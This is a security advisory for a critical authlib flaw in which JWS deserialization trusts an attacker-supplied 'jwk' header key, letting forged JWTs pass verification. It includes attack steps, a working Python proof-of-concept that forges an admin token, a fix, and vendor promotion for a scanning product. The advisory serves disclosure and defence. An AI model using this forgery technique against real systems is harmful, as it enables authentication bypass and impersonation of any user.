GHSA-wvwj-cvrp-7pv5
CRITICALAuthlib JWS JWK Header Injection: Signature Verification Bypass
EPSS Exploitation Probability
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Blast Radius
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Description
Description
Summary
A JWK Header Injection vulnerability in authlib's JWS implementation allows an unauthenticated
attacker to forge arbitrary JWT tokens that pass signature verification. When key=None is passed
to any JWS deserialization function, the library extracts and uses the cryptographic key embedded
in the attacker-controlled JWT jwk header field. An attacker can sign a token with their own
private key, embed the matching public key in the header, and have the server accept the forged
token as cryptographically valid — bypassing authentication and authorization entirely.
This behavior violates RFC 7515 §4.1.3 and the validation algorithm defined in RFC 7515 §5.2.
Details
Vulnerable file: authlib/jose/rfc7515/jws.py
Vulnerable method: JsonWebSignature._prepare_algorithm_key()
Lines: 272–273
elif key is None and "jwk" in header:
key = header["jwk"] # ← attacker-controlled key used for verification
When key=None is passed to jws.deserialize_compact(), jws.deserialize_json(), or
jws.deserialize(), the library checks the JWT header for a jwk field. If present, it extracts
that value — which is fully attacker-controlled — and uses it as the verification key.
RFC 7515 violations:
- §4.1.3 explicitly states the
jwkheader parameter is "NOT RECOMMENDED" because keys embedded by the token submitter cannot be trusted as a verification anchor. - §5.2 (Validation Algorithm) specifies the verification key MUST come from the application
context, not from the token itself. There is no step in the RFC that permits falling back to
the
jwkheader when no application key is provided.
Why this is a library issue, not just a developer mistake:
The most common real-world trigger is a key resolver callable used for JWKS-based key lookup. A developer writes:
def lookup_key(header, payload):
kid = header.get("kid")
return jwks_cache.get(kid) # returns None when kid is unknown/rotated
jws.deserialize_compact(token, lookup_key)
When an attacker submits a token with an unknown kid, the callable legitimately returns None.
The library then silently falls through to key = header["jwk"], trusting the attacker's embedded
key. The developer never wrote key=None — the library's fallback logic introduced it. The result
looks like a verified token with no exception raised, making the substitution invisible.
Attack steps:
- Attacker generates an RSA or EC keypair.
- Attacker crafts a JWT payload with any desired claims (e.g.
{"role": "admin"}). - Attacker signs the JWT with their private key.
- Attacker embeds their public key in the JWT
jwkheader field. - Attacker uses an unknown
kidto cause the key resolver to returnNone. - The library uses
header["jwk"]for verification — signature passes. - Forged claims are returned as authentic.
PoC
Tested against authlib 1.6.6 (HEAD a9e4cfee, Python 3.11).
Requirements:
pip install authlib cryptography
Exploit script:
from authlib.jose import JsonWebSignature, RSAKey
import json
jws = JsonWebSignature(["RS256"])
# Step 1: Attacker generates their own RSA keypair
attacker_private = RSAKey.generate_key(2048, is_private=True)
attacker_public_jwk = attacker_private.as_dict(is_private=False)
# Step 2: Forge a JWT with elevated privileges, embed public key in header
header = {"alg": "RS256", "jwk": attacker_public_jwk}
forged_payload = json.dumps({"sub": "attacker", "role": "admin"}).encode()
forged_token = jws.serialize_compact(header, forged_payload, attacker_private)
# Step 3: Server decodes with key=None — token is accepted
result = jws.deserialize_compact(forged_token, None)
claims = json.loads(result["payload"])
print(claims) # {'sub': 'attacker', 'role': 'admin'}
assert claims["role"] == "admin" # PASSES
Expected output:
{'sub': 'attacker', 'role': 'admin'}
Docker (self-contained reproduction):
sudo docker run --rm authlib-cve-poc:latest \
python3 /workspace/pocs/poc_auth001_jws_jwk_injection.py
Impact
This is an authentication and authorization bypass vulnerability. Any application using authlib's JWS deserialization is affected when:
key=Noneis passed directly, or- a key resolver callable returns
Nonefor unknown/rotatedkidvalues (the common JWKS lookup pattern)
An unauthenticated attacker can impersonate any user or assume any privilege encoded in JWT claims (admin roles, scopes, user IDs) without possessing any legitimate credentials or server-side keys. The forged token is indistinguishable from a legitimate one — no exception is raised.
This is a violation of RFC 7515 §4.1.3 and §5.2. The spec is unambiguous: the jwk
header parameter is "NOT RECOMMENDED" as a key source, and the validation key MUST come from
the application context, not the token itself.
Minimal fix — remove the fallback from authlib/jose/rfc7515/jws.py:272-273:
# DELETE:
elif key is None and "jwk" in header:
key = header["jwk"]
Recommended safe replacement — raise explicitly when no key is resolved:
if key is None:
raise MissingKeyError("No key provided and no valid key resolvable from context.")
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | authlib | all versions | 1.6.9 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for authlib. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update authlib to 1.6.9 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-wvwj-cvrp-7pv5 is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-wvwj-cvrp-7pv5 is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-wvwj-cvrp-7pv5. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-wvwj-cvrp-7pv5 in your dependencies?
O3 detects GHSA-wvwj-cvrp-7pv5 across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.